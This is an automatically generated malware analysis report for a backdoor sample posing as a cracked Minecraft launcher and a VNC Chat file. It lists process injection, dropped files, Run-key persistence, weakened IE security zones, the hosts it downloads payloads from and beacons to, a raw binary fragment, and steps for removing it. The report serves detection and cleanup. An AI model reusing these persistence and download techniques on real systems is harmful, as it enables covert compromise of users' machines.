Trojan.Win32.Inject.mwhq (Kaspersky), Trojan.GenericKD.1665749 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 7061c534cea9592508ea2e112d07029c
SHA1: a790bf538dee4543a267876ba10412a8eed9b974
SHA256: 710fc5cfca48bcca67fc437cdcce79f40f7d6664870f0ccc88a5616ca2ec0a61
SSDeep: 24576:U qxd7MUGBUrI88kLKpa8DEnQPNoypNR1o7bw/qaeDQD2hUF6zjyyjaWsiMC/pV:V1xmi8hBYQPNXhswA FKEisFR63
Size: 1933824 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: AirInstaller
Created at: 2014-03-23 13:16:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
879.exe:2224
879.exe:2196
%original file name%.exe:288
%original file name%.exe:1872
104.exe:1524
104.exe:684
104.exe:1956
104.exe:556
InstallDir.exe:2204
InstallDir.exe:2160
The Backdoor injects its code into the following process(es):
javaw.exe:680
svchost.exe:1592
iexplore.exe:3128
File activity
The process 879.exe:2224 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (0 bytes)
The process 879.exe:2196 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
The Backdoor deletes the following file(s):
The process %original file name%.exe:288 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)
The process %original file name%.exe:1872 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)
The process 104.exe:1524 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
The process 104.exe:684 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (239350 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (0 bytes)
The process 104.exe:1956 makes changes in the file system.
The Backdoor deletes the following file(s):
The process 104.exe:556 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (22474 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (0 bytes)
The process InstallDir.exe:2204 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (0 bytes)
The process InstallDir.exe:2160 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes)
Registry activity
The process 879.exe:2224 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 6A 9D 0F 52 26 BE E6 F1 61 89 1D AB D7 06 4E"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "879.exe"
The process %original file name%.exe:288 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 AC 78 2E EE 9B 5F 39 3B DD 60 B6 D9 64 A8 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"104.exe" = "1.7.4 Cracked Minecraft Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4802"
"wshext.dll,-4803"
"cryptext.dll,-6112"
"cryptext.dll,-6113"
"cryptext.dll,-6110"
"cdfview.dll,-4610"
"accwiz.exe,-16"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9918"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4801"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9927"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9912"
"unregmp2.exe,-9913"
"unregmp2.exe,-9910"
"unregmp2.exe,-9911"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\PCHealth\HelpCtr\Binaries]
"msinfo.dll,-391"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Movie Maker]
"wmm2res.dll,-63097"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9915"
"unregmp2.exe,-9916"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"RCBdyctl.dll,-150"
"msi.dll,-34"
"msi.dll,-35"
"cryptext.dll,-6111"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12346"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"notepad.exe,-469"
"shscrap.dll,-258"
"wshext.dll,-4805"
"msxml3r.dll,-1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-190"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"scrobj.dll,-8192"
"msxml3r.dll,-2"
"shimgvw.dll,-301"
"PresentationHost.exe,-3306"
"shimgvw.dll,-303"
"shimgvw.dll,-302"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-209"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-304"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Internet Explorer\Connection Wizard]
"icwres.dll,-20003"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-306"
"shimgvw.dll,-305"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9902"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"zipfldr.dll,-10195"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-208"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6109"
"cryptext.dll,-6108"
"wshext.dll,-4800"
"shimgvw.dll,-307"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12345"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"netshell.dll,-1300"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12347"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Procmon.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-22978"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9923"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"nmwb.dll,-1234"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9920"
"unregmp2.exe,-9909"
"unregmp2.exe,-9926"
"unregmp2.exe,-9925"
"unregmp2.exe,-9905"
"unregmp2.exe,-9904"
"unregmp2.exe,-9907"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3308"
"mmcbase.dll,-130"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9903"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"pdh.dll,-10023"
"icardres.dll.mui,-4162"
"SHELL32.dll,-8964"
"icardres.dll.mui,-4146"
"SHELL32.dll,-9227"
"setupapi.dll,-2000"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"cmd.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"sandbox_svc.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-881"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6145"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9914"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3300"
"wshext.dll,-4804"
"ntbackup.exe,-40"
"SHELL32.dll,-9217"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9908"
The process %original file name%.exe:1872 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 27 22 12 24 E0 95 6E 4B 24 E2 13 92 FC 27 0A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir]
"InstallDir.exe" = "VNC® Chat"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
"ServerStarted" = "6/15/2014 9:12:20 AM"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The process 104.exe:684 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 96 42 BB A2 BD 7C 7F EF EE E7 50 D2 E3 1B 49"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"
The process 104.exe:556 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC CF CF 2B FB C3 42 6C 85 0D 30 EF 9F 34 47 67"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"
The process InstallDir.exe:2204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\YwRtlw]
"ServerStarted" = "6/15/2014 9:13:00 AM"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\2204]
"Mutex" = "YwRtlw"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 89 4A E1 20 3E 72 01 F0 05 4F 20 C2 2C C0 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The process InstallDir.exe:2160 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 41 9E F3 C3 CB 81 70 D3 D5 3C 55 C4 C4 80 F9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"879.exe" = "1.7.4 Cracked Minecraft Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
49a4c5726b27df7d7fe01b938f3e68f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\104.exe |
5474216f6a34fd7a15b65a9c049f6287 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\879.exe |
b427962bdb196d132af50f6c7b78380d | c:\Program Files\Java\jre6\launch4j-tmp\879.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
879.exe:2224
879.exe:2196
%original file name%.exe:288
%original file name%.exe:1872
104.exe:1524
104.exe:684
104.exe:1956
104.exe:556
InstallDir.exe:2204
InstallDir.exe:2160
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: RealVNC Ltd
Product Name: HD Player
Product Version: 5.0.6 (r113416)
Legal Copyright: Copyright (c) 2002-2013 RealVNC Ltd.
Legal Trademarks: VNC is a registered trademark of RealVNC Ltd. in the U.S. and in other countries.
Original Filename: vncchat.exe
Internal Name: vncchat
File Version: 5.0.6 (r113416)
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 1663108 | 1663488 | 5.5427 | 19b64f2a3605f24c0adcfb9f0b9fa548 |
.rsrc | 1679360 | 268930 | 269312 | 4.45655 | 0298a39ab4fadfd1ee49aec74cb73937 |
.reloc | 1949696 | 12 | 512 | 0.067931 | 0a5bd6c7acedbd1af33ea553c85bf0da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://titanindex.net/LauncherUpdate/Minecraft Launcher.exe | |
hxxp://stats.teamextrememc.com/countgif.php | 162.159.247.124 |
hxxp://www.titanindex.net/LauncherUpdate/Minecraft Launcher.exe | 96.47.231.234 |
s3.amazonaws.com | 54.240.235.3 |
dl.dropboxusercontent.com | 50.16.206.191 |
dl.dropbox.com | 54.243.91.124 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /LauncherUpdate/Minecraft Launcher.exe HTTP/1.1
User-Agent: Java/1.6.0_18
Host: VVV.titanindex.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 15 Jun 2014 11:06:14 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Sun, 08 Jun 2014 17:37:33 GMT
ETag: "66a069b-17c244-4fb568cb44360"
Accept-Ranges: bytes
Content-Length: 1557060
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..S.................H...H...............`....@..........................`............@... ...................................... ..T2...........................................................................................................text...(G.......H.................. .0`.data........`.......L..............@.0..rdata.......p.......N..............@.0@.bss..................................0..idata...............T..............@.0..rsrc...T2... ...4...`..............@.0.........................................................................................................................................................................................................................................................................................................................................................................................................................U......]..U.1..u...1...=....wC=....r[.......$....1..T$..TD.....tz..t...$..............u..]...]...=....t.wJ=....t....u..]...]....=....t[=....u...$....1..t$...C.....tj..t...$........=........$..........L$...C......v....3A...l.....$....1..L$...C.....t0....R.....$.......?.....$..........D$..lC...%.....$..........\$..RC...............'....U..S..$.]...$..@.."D.......@...E........@..U..\$....`@..D$..T$..L$...$..@...C.....A...tX..`@.....A............t ...A..D$.....A..K0..$..B......A....t.....A..\$.....A..QP..$..
<<
<<< skipped >>>
GET /countgif.php HTTP/1.1
User-Agent: Java/1.6.0_18
Host: stats.teamextrememc.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sun, 15 Jun 2014 11:06:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d12838b93bfa00f1babb6383ccc8533421402830383000; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.teamextrememc.com; HttpOnly
Cache-Control: max-age=10
Expires: Sun, 15 Jun 2014 11:06:33 GMT
CF-RAY: 13ae4c45c81a020d-IAD
